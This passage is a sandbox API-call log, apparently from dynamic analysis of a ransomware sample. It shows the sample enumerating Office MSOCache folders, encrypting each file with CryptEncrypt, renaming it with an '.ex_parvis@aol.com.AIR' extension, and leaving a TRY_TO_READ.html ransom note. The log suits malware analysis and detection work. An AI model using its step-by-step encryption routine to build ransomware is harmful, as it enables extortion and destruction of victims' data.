	[0075.481] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.482] WriteFile (in: hFile=0x478, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.483] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.483] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.483] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2fac00) returned 0x3a20020
	[0075.484] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2fac00) returned 0x3d20020
	[0075.484] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.484] ReadFile (in: hFile=0x478, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x2fac00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x2fac00, lpOverlapped=0x0) returned 1
	[0075.656] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.656] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.656] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", dwFileAttributes=0x80) returned 1
	[0075.657] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 73
	[0075.657] GetProcessHeap () returned 0x540000
	[0075.657] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db4d8
	[0075.657] lstrcpyW (in: lpString1=0x5db4d8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab"
	[0075.657] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.657] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.659] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478
	[0075.659] GetProcessHeap () returned 0x540000
	[0075.659] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4d8 | out: hHeap=0x540000) returned 1
	[0075.659] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=18874884) returned 1
	[0075.659] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1200204
	[0075.659] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.659] GetProcessHeap () returned 0x540000
	[0075.659] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.659] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.660] WriteFile (in: hFile=0x478, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.661] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.661] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.661] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1200204) returned 0x3a20020
	[0075.662] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1200204) returned 0x4c30020
	[0075.663] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.663] ReadFile (in: hFile=0x478, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x1200204, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x1200204, lpOverlapped=0x0) returned 1
	[0076.916] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da230
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.917] GetLastError () returned 0x0
	[0076.917] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.917] GetLastError () returned 0x0
	[0076.917] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.917] GetLastError () returned 0x0
	[0076.917] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.917] GetLastError () returned 0x0
	[0076.918] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1
	[0076.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.918] GetLastError () returned 0x0
	[0076.918] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1
	[0076.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.918] GetLastError () returned 0x0
	[0076.918] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1
	[0076.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0076.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0076.918] GetLastError () returned 0x0
	[0076.918] FindNextFileW (in: hFindFile=0x5da230, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db6c0
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0076.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0076.918] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0076.918] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0076.918] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", dwFileAttributes=0x80) returned 1
	[0076.926] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 76
	[0076.926] GetProcessHeap () returned 0x540000
	[0076.926] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0076.926] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml"
	[0076.926] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0076.926] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0076.932] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c
	[0076.932] GetProcessHeap () returned 0x540000
	[0076.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0076.932] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=9503) returned 1
	[0076.932] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x251f
	[0076.932] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0076.932] GetProcessHeap () returned 0x540000
	[0076.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0076.932] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0076.932] WriteFile (in: hFile=0x47c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0076.934] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0076.934] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0076.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x251f) returned 0x5db768
	[0076.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x251f) returned 0x5ddc90
	[0076.934] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0076.934] ReadFile (in: hFile=0x47c, lpBuffer=0x5db768, nNumberOfBytesToRead=0x251f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db768*, lpNumberOfBytesRead=0x3a1f778*=0x251f, lpOverlapped=0x0) returned 1
	[0076.935] SetFilePointer (in: hFile=0x47c, lDistanceToMove=-9503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0076.936] WriteFile (in: hFile=0x47c, lpBuffer=0x5ddc90*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ddc90*, lpNumberOfBytesWritten=0x3a1f778*=0x251f, lpOverlapped=0x0) returned 1
	[0076.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db768 | out: hHeap=0x540000) returned 1
	[0076.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ddc90 | out: hHeap=0x540000) returned 1
	[0076.936] CloseHandle (hObject=0x47c) returned 1
	[0076.937] GetProcessHeap () returned 0x540000
	[0076.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0076.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0076.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0076.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db6c0 | out: hHeap=0x540000) returned 1
	[0076.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db618 | out: hHeap=0x540000) returned 1
	[0076.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db618
	[0076.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0076.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0076.937] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0076.937] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0076.937] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", dwFileAttributes=0x80) returned 1
	[0076.937] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 76
	[0076.938] GetProcessHeap () returned 0x540000
	[0076.938] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0076.938] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi"
	[0076.938] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0076.938] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0076.940] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c
	[0076.940] GetProcessHeap () returned 0x540000
	[0076.940] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0076.940] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2797568) returned 1
	[0076.940] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2ab000
	[0076.940] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0076.940] GetProcessHeap () returned 0x540000
	[0076.940] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0076.940] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0076.941] WriteFile (in: hFile=0x47c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0076.942] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0076.942] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0076.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2ab000) returned 0x3a20020
	[0076.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2ab000) returned 0x3cd0020
